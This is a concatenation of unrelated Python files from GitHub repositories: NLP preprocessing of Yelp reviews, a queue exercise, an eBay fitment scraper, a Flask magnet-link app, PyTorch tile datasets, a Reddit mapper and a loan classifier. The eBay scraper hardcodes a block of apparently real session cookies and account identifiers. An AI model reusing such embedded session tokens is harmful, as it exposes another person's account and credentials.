symbols\n return new_string\nremove_symbols(reviews[0]) # try function\nreviews = reviews.map(remove_symbols)\nrestaurant_reviews = pd.concat([restaurant_reviews, reviews], axis = 1)\nrestaurant_reviews.columns = ['Unnamed: 0.1', 'Unnamed: 0', 'business_id', 'name', 'address', 'city',\n 'state', 'stars', 'is_open', 'attributes', 'categories', 'user_id',\n 'review_stars', 'text', 'date', 'text_no_symbol']\nrestaurant_reviews.to_csv(\"restaurant_reviews.csv\")\n\n# function for stemming and tokenize words\nstemmer = SnowballStemmer(language='english')\ndef 
lemmatize_stemming(token):\n    # input: token word\n    # output: stemmed/lemmatized token\n    return stemmer.stem(WordNetLemmatizer().lemmatize(token, pos='v'))\n\n# function to remove stopwords\nstop_words = set(stopwords.words('english'))\ndef remove_stopwords(text):\n    # input: string\n    # output: list of tokenized words in string with stop words removed\n    filtered_sentence = [w for w in gensim.utils.simple_preprocess(text) if w.lower() not in stop_words]\n    return filtered_sentence\n\n# combine two functions for preprocessing\ndef preprocess(text):\n    # input: string\n    # output: list of tokenized words, stemmed and lemmatized\n    result = [lemmatize_stemming(token) for token in remove_stopwords(text)]\n    return result\npreprocess(reviews[65]) # test function\nreviews[0:2].map(preprocess)\n\n# time the function on a sample\nimport time\nstart = time.time()\nreviews[0:10000].map(preprocess)\nend = time.time()\nprint(\"Run time on 10000 samples: \" + str(end - start) + \" secs\") # about 15 seconds on 10k samples\n\nreviews = reviews.map(preprocess)\nrestaurant_reviews = pd.concat([restaurant_reviews, reviews], axis = 1)\nrestaurant_reviews.columns = ['Unnamed: 0.1', 'Unnamed: 0', 'business_id', 'name', 'address', 'city',\n                              'state', 'stars', 'is_open', 'attributes', 'categories', 'user_id',\n                              'review_stars', 'text', 'date', 'text_no_symbol', 'preprocessed_text']\nrestaurant_reviews.to_csv(\"restaurant_reviews.csv\")\n\n##### Detect Bigrams\n(x_train, x_test) = train_test_split(reviews, test_size = 0.3)\nx_train = x_train.sort_index() # reorder df\nx_train = x_train.reset_index() # reset index but preserve old index for later\nx_train_reviews = x_train['text']\nx_train.to_csv(\"x_train.csv\")\n\nx_test = x_test.sort_index()\nx_test = x_test.reset_index()\nx_test_reviews = x_test['text']\nx_test.to_csv(\"x_test.csv\")\n\n# construct bigrams for entire corpus\nstart = time.time()\n[[re.sub(\" \", \"_\", string) for string in [' '.join((a, b)) for (a, b) in review]] for review in reviews[0:10000].map(bigrams).map(list)]\nend = time.time()\nprint(\"Run time on 10000 samples: \" + str(end - start) + \" secs\") # 2.9 seconds for 10k docs\n\nbigram_reviews_train = [[re.sub(\" \", \"_\", string) for string in [' '.join((a, b)) for (a, b) in review]] for review in x_train_reviews.map(bigrams).map(list)]\nunlist_bigram_reviews_train = list(chain.from_iterable(bigram_reviews_train)) # flatten list\n\n# find most common bigrams\ncommon_bigrams = [a for (a, b) in Counter(unlist_bigram_reviews_train).most_common(100)]\ncounts = [b for (a, b) in Counter(unlist_bigram_reviews_train).most_common(100)]\nnp.min(counts) # bigrams show up at least 5022 times in entire corpus\n\n\nnew_tokenized = []\n\ndef tokenize_review(review):\n    # input: review\n    # output: tokenized review accounting for bigrams\n    # i.e. 
if two tokens form a common bigram, they are kept as one bigram token instead of two individual tokens\n    tokenize = []\n    j = 0\n    while j < len(review) - 1:\n        if '_'.join((review[j], review[j+1])) in common_bigrams:\n            tokenize.append('_'.join((review[j], review[j + 1])))\n            j += 2\n        else:\n            if len(review[j]) > 3: # only consider words with more than 3 letters\n                tokenize.append(review[j])\n            j += 1\n    if j == len(review) - 1:\n        if len(review[j]) > 3:\n            tokenize.append(review[j])\n    return tokenize\n[tokenize_review(review) for review in reviews[0:2]] # test function\n\nstart = time.time()\ntokenized_bigram_train = [tokenize_review(review) for review in x_train_reviews]\ntokenized_bigram_test = [tokenize_review(review) for review in x_test_reviews]\nend = time.time()\nprint(\"Run time on full train/test sets: \" + str(end - start) + \" secs\")\n\nx_train[\"tokenized_bigram_train\"] = tokenized_bigram_train\nx_test[\"tokenized_bigram_test\"] = tokenized_bigram_test\nx_train.to_csv(\"x_train.csv\")\nx_test.to_csv(\"x_test.csv\")\n# save lists as json\n\nwith open(\"tokenized_bigram_train.json\", 'w') as f:\n    json.dump(tokenized_bigram_train, f, indent = 2)\nwith open(\"tokenized_bigram_test.json\", 'w') as f:\n    json.dump(tokenized_bigram_test, f, indent=2)\n\n", "repo_name": "samantha-tsang/yelpReviewsAnalysis", "sub_path": "data.py", "file_name": "data.py", "file_ext": "py", "file_size_in_byte": 7767, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_json", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 49, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 62, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 67, "usage_type": "call"}, {"api_name": "nltk.stem.SnowballStemmer", "line_number": 74, "usage_type": "call"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 78, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 81, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 81, "usage_type": "name"}, {"api_name": "gensim.utils.simple_preprocess", "line_number": 85, "usage_type": "call"}, {"api_name": "gensim.utils", "line_number": 85, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 99, "usage_type": "call"}, {"api_name": "time.time", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 105, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 112, "usage_type": "call"}, {"api_name": "time.time", "line_number": 124, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 125, "usage_type": "call"}, {"api_name": "nltk.bigrams", "line_number": 125, "usage_type": "argument"}, {"api_name": "time.time", "line_number": 126, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 129, "usage_type": "call"}, {"api_name": "nltk.bigrams", "line_number": 129, "usage_type": "argument"}, {"api_name": "itertools.chain.from_iterable", "line_number": 130, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 130, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 133, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 134, 
"usage_type": "call"}, {"api_name": "numpy.min", "line_number": 135, "usage_type": "call"}, {"api_name": "time.time", "line_number": 160, "usage_type": "call"}, {"api_name": "time.time", "line_number": 163, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 173, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 175, "usage_type": "call"}]}
+{"seq_id": "16333487097", "text": "from collections import deque\r\nclass QUEUE: # use deque\r\n def __init__(self, q=None):\r\n if q == None:\r\n self.items = deque()\r\n else:\r\n self.items = deque(q, len(q))\r\n def enQueue(self, i):\r\n self.items.append(i)\r\n def deQueueRight(self):\r\n self.items.pop()\r\n def deQueue(self):\r\n return self.items.popleft()\r\n\r\n def isEmpty(self):\r\n return len(self.items) == 0\r\n\r\n def size(self):\r\n return len(self.items)\r\n def showQueu(self):\r\n Q = []\r\n for i in self.items:\r\n Q.append(i)\r\n return Q\r\n\r\ninp = [k for k in input(\"Enter Input : \").split(\",\")]\r\nq = QUEUE()\r\ncheck = False\r\ncheck2 = False\r\ncheck3 = False\r\nfor l in range(0,len(inp)):\r\n if all(j == 'D' for j in inp ) == True :\r\n print(\"-1\")\r\n continue\r\n if inp[l] == 'D':\r\n if not q.isEmpty():\r\n print(f'Pop {q.items[0]}',end=\" \")\r\n q.deQueue()\r\n print(f'size in queue is {q.size()}',)\r\n if q.isEmpty() and check == True:\r\n check3 = True\r\n print('-1')\r\n continue\r\n else:\r\n if check == False:\r\n print('-1')\r\n check = True\r\n check2 = True\r\n continue\r\n\r\n\r\n if 'E' in inp[l]:\r\n E, value = inp[l].split()\r\n if E == 'E':\r\n print(f'Add {value} index is {q.size()}')\r\n q.enQueue(value)\r\n\r\nif not q.isEmpty():\r\n print(f'Number in Queue is : {q.showQueu()}')\r\nelse:\r\n print('Empty')\r\n\r\n", "repo_name": "Paramee0598/Data_Structures_ExAndTest", "sub_path": "ch4/ex41.py", "file_name": "ex41.py", "file_ext": "py", "file_size_in_byte": 1571, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "collections.deque", "line_number": 5, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 7, "usage_type": "call"}]}
+{"seq_id": "31104010606", "text": "import pandas as pd\nimport re\nimport csv\nimport pymongo\nfrom bs4 import BeautifulSoup\nfrom multiprocessing.pool import ThreadPool\nfrom helpers.downloader_helper import DownloaderHelper\n\ndownloader = DownloaderHelper(use_proxy=True, client_name='all')\n\n\ndef get_collection():\n try:\n connection = pymongo.MongoClient('localhost', 27017)\n db = connection['slava']\n collection = db['ebay_group_deal_store']\n except Exception as e:\n raise e\n return collection\n\n\ndef get_product_to_scrape():\n collection = get_collection()\n result = list(collection.find({\"ebay_search_result.fitment\": \"\"}, {'Product': 1, '_id': 0}))\n products_to_scrape = {str(source_item['Product']): source_item for source_item in result}\n\n # get items to process\n items_to_process = []\n for product_id in products_to_scrape.keys():\n items_to_process.append(products_to_scrape[product_id])\n print(len(items_to_process))\n return items_to_process\n\n\ndef chunkify(l, n):\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\n\ndef write_to_csv(output_list, method, delimiter):\n output_file = '/home/slava/Slava_Projects/New_Ebay/FIles/output_file_copy.csv'\n\n with open(output_file, method) as f:\n writer = csv.writer(f, delimiter=delimiter, quoting=csv.QUOTE_MINIMAL)\n writer.writerows([output_list])\n\n\ndef get_page(url):\n cookies = {'_ga': 'GA1.2.415030213.1540820804', '_gid': 'GA1.2.1929604581.1540820804',\n 'AMCVS_A71B5B5B54F607AB0A4C98A2%40AdobeOrg': '1',\n 'bm_sv': '2B0EAE81F8211718FF0CBEB7B77D1638~R5jZTqLv3jspGpIq/lpHpneJ3ICLd+YsnA0ziCJ5aU9dYnNFqNc3YFywpJvOLo5dQPnX3qmMZDa0DtNQLjGDTgxMZ4WWdsnb427VvuFjeZIDBQO/j+48A5HhZJveqS7wnWho9Wr2ADppgNItZv5BNBcRyL8wQB8q7yVznGI03G4',\n 'ak_bmsc': '1AABA9E4B8BAF724D36F7ADB269CD1F4685E645DB4660000250DD75BD7C74F0A~pl0KjlYyCW59HjQRYcqlEmDZB0T++X8CD2inbLIVr8n88mds81Z+cbD/yFEIvQopX1FvfQ0RhbHpOIqcZ02BPY5HUvCZrYR+9FZK59JJM6F5mAeuRgo63IlXS9T5PgpJfMSlcHafxhDXsyC9Y81TChf6ZU4gqjrMDfYZi7BkYKd0tlCis7lCYK3laKcGGQauwzl4MerH1emkegsunHjbvN6BIvr+q274H9iyFe5jR99kU',\n 'cid': '3za4G3Gj8Gn7nEfV%23551347784', 'ds1': 'ats/1540834013526',\n 'aam_uuid': '65016836551818795772119429020039847006', 'cssg': 'ab4d76f61660aad9a112c56afe64d3f6',\n 'JSESSIONID': 'C3BF53B00AC731F21BE0FD513B88B8B8',\n '__gads': 'ID=ee6ba28b70854516:T=1544705983:S=ALNI_MYHEqtZ0goNC9Y-72RAyWojBgEemA',\n 'AMCV_A71B5B5B54F607AB0A4C98A2%40AdobeOrg': '-1758798782%7CMCIDTS%7C17878%7CMCMID%7C65004536900471973482118213068408661475%7CMCAAMLH-1545242975%7C6%7CMCAAMB-1545311304%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCCIDH%7C-141992339%7CMCOPTOUT-1544713704s%7CNONE%7CMCAID%7CNONE',\n 'npii': 'btguid/ab4d76f61660aad9a112c56afe64d3f65df38d57^cguid/ab4d76ff1660aad9a112c56afe64d3f05df38d57^',\n 'ns1': 'BAQAAAWd7qgEFAAaAAKUADV3zjWwxODU2MzQ3ODcwLzA7ANgAWF3zjWxjODR8NjAxXjE1NDA4MzQwMTQwMDZeYVhad1pYUXhOUT09XjFeM3wyfDV8NHw3fDExXjFeMl40XjNeMTJeMTJeMl4xXjFeMF4xXjBeMV42NDQyNDU5MDc1JPhAofINc4vakRyi2ER3jRI09L8*',\n 'dp1': 'bkms/in5fd4c0ec^u1f/Ivan5df38d6c^u1p/aXZwZXQxNQ**5df38d6c^bl/USen-US5fd4c0ec^expt/00015415880860125cd35e36^pbf/%23e000e000008180c20000045df38d6c^',\n 's': 'CgAD4ACBcE6tsYWI0ZDc2ZjYxNjYwYWFkOWExMTJjNTZhZmU2NGQzZjYA7gCfXBOrbDMGaHR0cHM6Ly93d3cuZWJheS5jb20vc2NoL2kuaHRtbD9fZnJvbT1SNDAmX3Rya3NpZD1tNTcwLmwxMzEzJl9ua3c9QUMxMDAwMTc3UiZfc2FjYXQ9MCZMSF9UaXRsZURlc2M9MCZfb3NhY2F0PTAmX29ka3c9QUMxMDAwMTc3JkxIX1RpdGxlRGVzYz0wI2l0ZW0zNjIzODBiNTY2B86xLdY*',\n 'nonsession': 
'BAQAAAWd7qgEFAAaAAJ0ACF3zjWwwMDAwMDAwMQFkAARd841sIzA4YQAIABxcOebsMTU0NDcwNTk4MXgyMzI1MjM4NzE1OTB4MHgyWQAzAA5d841sMTEyMjAtMTcxNCxVU0EAywACXBJg9DkxAEAAB13zjWxpdnBldDE1ABAAB13zjWxpdnBldDE1AMoAIGV4W2xhYjRkNzZmNjE2NjBhYWQ5YTExMmM1NmFmZTY0ZDNmNgAEAAdduHZdaXZwZXQxNQCcADhd841sblkrc0haMlByQm1kajZ3Vm5ZK3NFWjJQckEyZGo2QU1sWVNpREplS3BneWRqNng5blkrc2VRPT1BS2xSDGgmYGXqrN2V0G6ArYeFWA**',\n 'ebay': '%5EsfLMD%3D0%5Esin%3Din%5Edv%3D5bd73943%5Esbf%3D%2340400000000010000000004%5Ecos%3D2%5Ecv%3D15555%5Ejs%3D1%5Epsi%3DArqzCyjo*%5E',\n 'ds2': 'sotr/b8_5azzzzzzz^'}\n attempts = 20\n while attempts > 0:\n attempts -= 1\n try:\n overview_page = downloader.get_page(url, cookies)\n soup = BeautifulSoup(overview_page, 'lxml')\n return soup\n except:\n pass\n\n\ndef get_links(sku):\n items_links = []\n soup = get_page('https://www.ebay.com/sch/i.html?_from=R40&_trksid=m570.l1313&_nkw='+str(sku)+'&_sacat=0')\n try:\n results = soup.find('h1', class_='srp-controls__count-heading').text.split(' ')[0]\n except:\n pass\n if results != '0':\n try:\n items = soup.find('ul', id='ListViewInner')\n links_list = items.find_all('li', class_=re.compile('^sresult lvresult clearfix li'))\n except:\n try:\n items = soup.find('ul', class_='srp-results srp-list clearfix')\n links_list = items.find_all('li', class_='s-item')\n except:\n pass\n try:\n for link in links_list:\n items_links.append(link.find('div', class_='s-item__info clearfix').find('a')['href'])\n except:\n pass\n\n return items_links\n\n\ndef found_fitment(link):\n fitment = False\n ebay_id = None\n soup = get_page(link)\n fitments = soup.find('div', id='vi-ilComp')\n if fitments:\n fitment = True\n ebay_id = soup.find('div', id='descItemNumber').text\n return fitment, ebay_id\n\n\ndef get_fitment(item):\n # if item['Match'] is None:\n fitment_found = False\n sku = item['sku']\n item_links_sku = get_links(sku)\n if item_links_sku:\n for item_link in item_links_sku:\n fitment, ebay_id = found_fitment(item_link)\n if fitment:\n item['Match'] = ebay_id\n fitment_found = True\n break\n if not fitment_found:\n sku2 = item['sku 2']\n item_links_sku2 = get_links(sku2)\n if item_links_sku2:\n for item_link in item_links_sku2:\n fitment, ebay_id = found_fitment(item_link)\n if fitment:\n item['Match'] = ebay_id\n fitment_found = True\n break\n\n if not fitment_found:\n item['Match'] = 'Not found'\n return item\n\n\ndef get_product_title(link):\n pass\n\n\ndef get_fit_and_id(product_to_scrap):\n collection = get_collection()\n for product in product_to_scrap.keys():\n try:\n for link in get_links(product_to_scrap[product]):\n fit, ebay_id = found_fitment(link)\n if fit:\n break\n search_result = {\"fitment\": fit, \"ebay_id\": ebay_id}\n except:\n pass\n try:\n collection.update_one(\n {\"Product\": product_to_scrap[product]},\n {\"$set\": {\n \"ebay_search_result\": search_result,\n }}\n )\n except UnboundLocalError as err:\n continue\n print(\"%s - product was update\" % product_to_scrap[product])\n print(search_result)\n\n\ndef main():\n pool = ThreadPool(30)\n data = pool.map(get_fit_and_id, get_product_to_scrape())\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "RickWazowski98/ebay_scraper", "sub_path": "Ebay/new_ebay.py", "file_name": "new_ebay.py", "file_ext": "py", "file_size_in_byte": 7399, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "helpers.downloader_helper.DownloaderHelper", "line_number": 9, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 14, 
"usage_type": "call"}, {"api_name": "csv.writer", "line_number": 44, "usage_type": "call"}, {"api_name": "csv.QUOTE_MINIMAL", "line_number": 44, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 70, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 86, "usage_type": "call"}, {"api_name": "multiprocessing.pool.ThreadPool", "line_number": 170, "usage_type": "call"}]}
+{"seq_id": "38537884967", "text": "#! /usr/bin/env python3\n\nfrom flask import Flask, redirect, request\n\nfrom controllers import magnet_link_controller\nfrom view import View\n\napp = Flask(__name__)\n\n@app.route(\"/\", methods = [\"GET\"])\ndef index() -> str:\n html = View(\"index\")\n return html.render()\n\n\n@app.route(\"/create_magnet_link\", methods = [\"POST\", \"GET\"])\ndef create_magnet_link() -> str | None:\n try:\n if request.method == \"POST\":\n name = request.form[\"name\"]\n uri = request.form[\"uri\"]\n magnet_link_controller.create_magnet_link(name, uri)\n return redirect(f\"/search_magnet_links?name={name}\")\n\n html = View(\"pages/magnet_link/create_magnet_link\")\n return html.render()\n except Exception as exception:\n return \"ERROR: \" + str(exception)\n\n\n@app.route(\"/search_magnet_links\", methods = [\"GET\"])\ndef search_magnet_links() -> str:\n try:\n name = request.args.get(\"name\")\n result = magnet_link_controller.search_magnet_links(name)\n html = View(\"pages/magnet_link/search_magnet_links\")\n return html.render({ \"magnet_links\": result })\n except Exception as exception:\n return \"ERROR: \" + str(exception)\n\n\nif __name__ == \"__main__\":\n app.run()\n", "repo_name": "Raisess/magnet-database", "sub_path": "src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "32", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "view.View", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "controllers.magnet_link_controller.create_magnet_link", "line_number": 22, "usage_type": "call"}, {"api_name": "controllers.magnet_link_controller", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 23, "usage_type": "call"}, {"api_name": "view.View", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "controllers.magnet_link_controller.search_magnet_links", "line_number": 35, "usage_type": "call"}, {"api_name": "controllers.magnet_link_controller", "line_number": 35, "usage_type": "name"}, {"api_name": "view.View", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "41317956929", "text": "\"\"\"PyTorch-compatible datasets.\n\nGuaranteed to implement `__len__`, and `__getitem__`.\n\nSee: http://pytorch.org/docs/0.3.1/data.html\n\"\"\"\nfrom path import Path\n\nimport torch\nfrom PIL import Image\nimport torch.utils.data\nfrom torchvision.transforms import Compose, Normalize\nfrom .transforms import ConvertImageMode, ImageToTensor\nimport cv2\nfrom .tiles import tiles_from_slippy_map, buffer_tile_image\nimport numpy as np\n\nmean, std = [0.485, 0.456, 0.406], [0.229, 0.224, 0.225]\n\n# Single Slippy Map directory structure\nclass SlippyMapTiles(torch.utils.data.Dataset):\n \"\"\"Dataset for images stored in slippy map format.\n \"\"\"\n\n def __init__(self, root, transform=None):\n super().__init__()\n\n self.tiles = []\n self.transform = transform\n\n self.tiles = [(tile, path) for tile, path in tiles_from_slippy_map(root)]\n self.tiles.sort(key=lambda tile: tile[0])\n\n def __len__(self):\n return len(self.tiles)\n\n def __getitem__(self, i):\n tile, path = self.tiles[i]\n image = Image.open(path)\n\n if self.transform is not None:\n image = self.transform(image)\n\n return image, tile\n\n\n# Multiple Slippy Map directories.\n# Think: one with images, one with masks, one with rasterized traces.\nclass SlippyMapTilesConcatenation(torch.utils.data.Dataset):\n \"\"\"Dataset to concate multiple input images stored in slippy map format.\n \"\"\"\n\n def __init__(self, inputs, target, joint_transform=None,debug = False,test = False):\n super().__init__()\n\n # No transformations in the `SlippyMapTiles` instead joint transformations in getitem\n self.joint_transform = joint_transform\n self.test = test\n if debug == False:\n self.inputs = Path(inputs).files()\n print(self.inputs)\n if self.test == False:\n self.target = Path(target).files()\n else:\n self.inputs = Path(inputs).files()[:1000]\n if self.test == False:\n self.target = Path(target).files()\n self.test_transform =Compose([ConvertImageMode(mode=\"RGB\"), ImageToTensor(), Normalize(mean=mean, std=std)])\n\n def __len__(self):\n# return len(self.target)\n return len(self.inputs)\n\n def __getitem__(self, i):\n # at this point all transformations are applied and we expect to work with raw tensors\n\n images = Image.open(self.inputs[i])\n if self.test == False:\n mask = Image.open(self.target[i]).convert('L')\n \n if self.joint_transform is not None:\n images, mask = self.joint_transform(images, mask)\n\n if len(mask.shape) == 3: \n mask = mask.squeeze(0)\n return images, mask\n else:\n return self.test_transform(images)\n# Todo: once we have the SlippyMapDataset this dataset should wrap\n# it adding buffer and unbuffer glue on top of the raw tile dataset.\nclass BufferedSlippyMapDirectory(torch.utils.data.Dataset):\n \"\"\"Dataset for buffered slippy map tiles with overlap.\n \"\"\"\n\n def __init__(self, root, transform=None, size=512, overlap=32):\n \"\"\"\n Args:\n root: the slippy map directory root with a `z/x/y.png` sub-structure.\n transform: the transformation to run on the buffered tile.\n size: the Slippy Map tile size in pixels\n overlap: the tile border to add on every side; in pixel.\n\n Note:\n The overlap must not span multiple tiles.\n\n Use `unbuffer` to get back the original tile.\n \"\"\"\n\n super().__init__()\n\n assert overlap >= 0\n assert size >= 256\n\n self.transform = transform\n self.size = size\n self.overlap = overlap\n self.tiles = list(tiles_from_slippy_map(root))\n\n def __len__(self):\n return len(self.tiles)\n\n def __getitem__(self, i):\n tile, path = 
self.tiles[i]\n image = buffer_tile_image(tile, self.tiles, overlap=self.overlap, tile_size=self.size)\n\n if self.transform is not None:\n image = self.transform(image)\n\n return image, torch.IntTensor([tile.x, tile.y, tile.z])\n\n def unbuffer(self, probs):\n \"\"\"Removes borders from segmentation probabilities added to the original tile image.\n\n Args:\n probs: the segmentation probability mask to remove buffered borders.\n\n Returns:\n The probability mask with the original tile's dimensions without added overlap borders.\n \"\"\"\n\n o = self.overlap\n _, x, y = probs.shape\n\n return probs[:, o : x - o, o : y - o]\n", "repo_name": "HMS97/satellite_segmentation", "sub_path": "utils/datasets.py", "file_name": "datasets.py", "file_ext": "py", "file_size_in_byte": 4613, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "32", "api": [{"api_name": "torch.utils", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tiles.tiles_from_slippy_map", "line_number": 31, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 39, "usage_type": "name"}, {"api_name": "torch.utils", "line_number": 49, "usage_type": "attribute"}, {"api_name": "path.Path", "line_number": 60, "usage_type": "call"}, {"api_name": "path.Path", "line_number": 63, "usage_type": "call"}, {"api_name": "path.Path", "line_number": 65, "usage_type": "call"}, {"api_name": "path.Path", "line_number": 67, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 68, "usage_type": "call"}, {"api_name": "transforms.ConvertImageMode", "line_number": 68, "usage_type": "call"}, {"api_name": "transforms.ImageToTensor", "line_number": 68, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 68, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 77, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 77, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 79, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.utils", "line_number": 91, "usage_type": "attribute"}, {"api_name": "tiles.tiles_from_slippy_map", "line_number": 117, "usage_type": "call"}, {"api_name": "tiles.buffer_tile_image", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.IntTensor", "line_number": 129, "usage_type": "call"}]}
+{"seq_id": "4393604499", "text": "#!/usr/bin/python3\nimport os\nimport json\nimport sys\n\n# Notes :\n# 1. All Down votes are 0\n# 2. All Controversiality are 0\n\n\n# Option or NLP: NLTK, spaCy\n\nf = open(\"./mp-author-count-in-subreddits/part-00000\", \"r\")\ntop_subreddits=[line.split(\"\\t\")[0].replace(\"\\n\",\"\") for line in f.readlines() if line != \"\\t\\n\"]\n\n\nfor line in sys.stdin:\n try: \n j_i=json.loads(line)\n except:\n continue\n if j_i[\"subreddit\"] in top_subreddits:\n print(j_i[\"author\"]+\"_sep_\"+j_i[\"subreddit\"],1,sep=\"\\t\")", "repo_name": "Mahmoud-Yasser-18/Big-Data-mini-1", "sub_path": "Task1/mp-author-count-in-subreddits/mapper.py", "file_name": "mapper.py", "file_ext": "py", "file_size_in_byte": 511, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "sys.stdin", "line_number": 17, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "13090474027", "text": "import string\nimport json\nimport random\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport graphviz\nfrom os import system\nfrom math import log, sqrt\nfrom sklearn import preprocessing\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\n\n\ndef make_figure(dim, title, xlabel, ylabel, legend):\n plt.rcParams['figure.figsize'] = dim\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n if legend is not None:\n plt.legend(loc=legend, prop={'size': 15})\n plt.rcParams.update({'font.size': 16})\n plt.tight_layout()\n plt.show()\n\n\n\n# load data set\nloans = pd.read_csv('lending-club-data.csv')\nloans['safe_loans'] = loans['bad_loans'].apply(lambda x: +1 if x == 0 else -1)\ndel loans['bad_loans']\n\n# Selecting features\ntarget = 'safe_loans'\nfeatures = ['grade', # grade of the loan (categorical)\n 'sub_grade_num', # sub-grade of the loan as a number from 0 to 1\n 'short_emp', # one year or less of employment\n 'emp_length_num', # number of years of employment\n 'home_ownership', # home_ownership status: own, mortgage or rent\n 'dti', # debt to income ratio\n 'purpose', # the purpose of the loan\n 'payment_inc_ratio', # ratio of the monthly payment to income\n 'delinq_2yrs', # number of delinquincies\n 'delinq_2yrs_zero', # no delinquincies in last 2 years\n 'inq_last_6mths', # number of creditor inquiries in last 6 months\n 'last_delinq_none', # has borrower had a delinquincy\n 'last_major_derog_none', # has borrower had 90 day or worse rating\n 'open_acc', # number of open credit accounts\n 'pub_rec', # number of derogatory public records\n 'pub_rec_zero', # no derogatory public records\n 'revol_util', # percent of available credit being used\n 'total_rec_late_fee', # total late fees received to day\n 'int_rate', # interest rate of the loan\n 'total_rec_int', # interest received to date\n 'annual_inc', # annual income of borrower\n 'funded_amnt', # amount committed to the loan\n 'funded_amnt_inv', # amount committed by investors for the loan\n 'installment', # monthly payment owed by the borrower\n ]\n\n\n# Skipping observations with missing values\nprint (loans.shape)\nloans = loans[[target] + features].dropna()\nprint (loans.shape)\n\n# one-hot encoding\ncategorical_variables = []\nfor feat_name, feat_type in zip(loans.columns, loans.dtypes):\n if feat_type == object:\n categorical_variables.append(feat_name)\n\nfor feature in categorical_variables:\n loans_one_hot_encoded = pd.get_dummies(loans[feature], prefix=feature)\n loans = loans.drop(feature, axis=1)\n for col in loans_one_hot_encoded.columns:\n loans[col] = loans_one_hot_encoded[col]\n\n#####################################################################################################################\n\n\n# train-validation sets\nwith open('module-8-assignment-1-train-idx.json', 'r') as f:\n train_json = json.load(f)\nwith open('module-8-assignment-1-validation-idx.json', 'r') as f:\n validation_json = json.load(f)\ntrain_data = loans.iloc[train_json]\nvalidation_data = loans.iloc[validation_json]\n\n# Gradient boosted tree classifier\ntrain_Y = train_data['safe_loans'].as_matrix()\ntrain_X = train_data.drop('safe_loans', axis=1).as_matrix()\nmodel_5 = GradientBoostingClassifier(n_estimators=5, max_depth=6).fit(train_X, train_Y)\n\n\n# Making predictions\n# Select all positive and negative examples.\nvalidation_safe_loans = validation_data[validation_data[target] == 1]\nvalidation_risky_loans = 
